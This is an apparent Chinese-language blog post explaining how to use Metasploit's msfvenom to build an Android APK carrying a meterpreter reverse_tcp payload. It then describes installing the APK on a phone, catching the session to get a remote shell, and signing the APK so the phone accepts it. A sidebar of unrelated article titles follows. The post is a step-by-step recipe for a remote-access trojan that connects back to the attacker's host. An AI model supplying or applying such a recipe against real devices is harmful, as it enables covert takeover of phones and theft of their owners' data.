利用Metasploit攻击Android
2024-09-02 22:31:43
首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是:
msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk
注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来;’
LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口;
-R:表示要生成的文件类型;
> /root/rb.apk:表示生成文件的保存路径;
那么接下来就开始配置:
攻击端配置成功之后在手机端将之前生成好的apk文件导入手机中,然后供给端就开始exploit,则可以看出回话的连接状态:
选择连接会话,进入控制shell,则可以查看使得内容信息与版本信息:
【注意:在将Kali里面生成的apk文件直接导入手机时可能会发生错误,那是因为apk文件缺少授权,所以我们下载一个制作签名的软件,给此文件进行授权,则就可以导入了】
最新文章
- CUDA学习笔记(四)——CUDA性能
- SweetAlert2 使用教程
- [javascript|基本概念|Boolean]学习笔记
- Vue+axios 实现http拦截及路由拦截
- 无阻塞加载和defer、async
- 在Eclipse中写web工程 发现import javax.servlet.http.HttpSession无法引入
- 数据库连接问题之:Caused by: java.sql.SQLException: Connections could not be acquired from the underlying database!
- anguments
- 【洛谷P1659】啦啦队排练
- js分享功能(微信,QQ,微博,空间,豆瓣等)
- 《CLR via C#》读书笔记(一)——CLR的执行模式
- C C++互相调用注意
- Jmeter之发送请求入参必须使用编码格式、Jmeter之发送Delete请求可能入参需要使用编码格式
- Linux 单引号和双引号的区别
- tp5文件上传展示
- CentOS防火墙配置
- 跟上Java8 - 日期和时间实用技巧
- iOS开发-Objective-C Block的实现方式
- Java的StringAPI的小练习
- page next page prev